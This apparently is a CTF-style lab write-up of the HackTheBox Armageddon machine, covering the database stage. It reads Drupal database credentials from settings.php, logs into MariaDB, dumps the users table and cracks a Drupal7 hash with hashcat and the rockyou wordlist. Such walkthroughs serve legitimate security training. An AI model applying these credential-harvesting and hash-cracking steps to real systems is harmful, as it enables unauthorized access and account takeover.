InfoSec LAB

Armageddon_DB

Created: 3 min read

DB

i have confirmed that the 127.0.0.1:3306 socket is up and listening. That’s likely the mssqld process

Drupal mostly stores DB credential at the sites/default/settings.php file

sh-4.2$ ll sites/default
total 56K
  0 drwxrwxr-x. 3 apache apache  37 Dec  3  2020 files
28K -r--r--r--. 1 apache apache 26K Dec  3  2020 settings.php
  0 dr-xr-xr-x. 3 apache apache  67 Dec  3  2020 .
  0 drwxr-xr-x. 4 apache apache  75 Jun 21  2017 ..
28K -rw-r--r--. 1 apache apache 26K Jun 21  2017 default.settings.php

Checking the sites/default directory indeed reveals the settings.php file

sh-4.2$ cat sites/default/settings.php
<?php
 
[...REDACTED...]
 
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
 
[...REDACTED...]

db credential found; drupaluser:CQHEy@9M*m23gBVj before checking for password reuse, I will see the DB itself first

sh-4.2$ mysql -udrupaluser -p
enter password: CQHEy@9M*m23gBVj

it doesn’t seem like i am able to connect to the mysqld instance running in the 127.0.0.1:3306 socket It just hangs

brucetherealadmin

[brucetherealadmin@armageddon ~]$ mysql -udrupaluser -pCQHEy@9M*m23gBVj
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 287
Server version: 5.5.68-MariaDB MariaDB Server
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

I was able to connect to the mysqld instance after making a lateral movement to the brucetherealadmin user via SSH The fact that I am not able to connect to the mysqld instance suggests that the earlier attempt failed for 2 possible reasons:

  1. The PHP reverse shell session wasn’t stable enough to get into another mysql CLI session
  2. The apache user did not have enough privileges

Nevertheless, I will continue the enumeration

DB

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupal             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)
 
MariaDB [(none)]> use drupal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

I will be checking the drupal DB

drupal.users

MariaDB [drupal]> select name,pass from users;
+-------------------+---------------------------------------------------------+
| name              | pass                                                    |
+-------------------+---------------------------------------------------------+
|                   |                                                         |
| brucetherealadmin | $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt |
+-------------------+---------------------------------------------------------+
2 rows in set (0.00 sec)

Checking the drupal.users table reveals the web credential of the brucetherealadmin user

Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ hashcat -a 0 -m 7900 brucetherealadmin.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
minimum password length supported by kernel: 0
maximum password length supported by kernel: 256
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
$s$dgl2gjv6ztxbo6cdqzeyjubphbmrcqiv6w97.oosuf1xahaadurt:booboo
 
session..........: hashcat
status...........: Cracked
hash.mode........: 7900 (Drupal7)
hash.target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
time.started.....: Mon Apr  3 20:57:24 2023 (2 secs)
time.estimated...: Mon Apr  3 20:57:26 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:      220 H/s (13.46ms) @ Accel:32 Loops:1024 Thr:1 Vec:4
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 288/14344385 (0.00%)
rejected.........: 0/288 (0.00%)
restore.point....: 192/14344385 (0.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:31744-32768
candidate.engine.: Device Generator
candidates.#1....: alyssa -> brenda
hardware.mon.#1..: Util: 88%
 
started: Mon Apr  3 20:57:22 2023
stopped: Mon Apr  3 20:57:27 2023

cracking the password hash confirms password reuse on the credential; brucetherealadmin:booboo

Interactive Graph View

Backlinks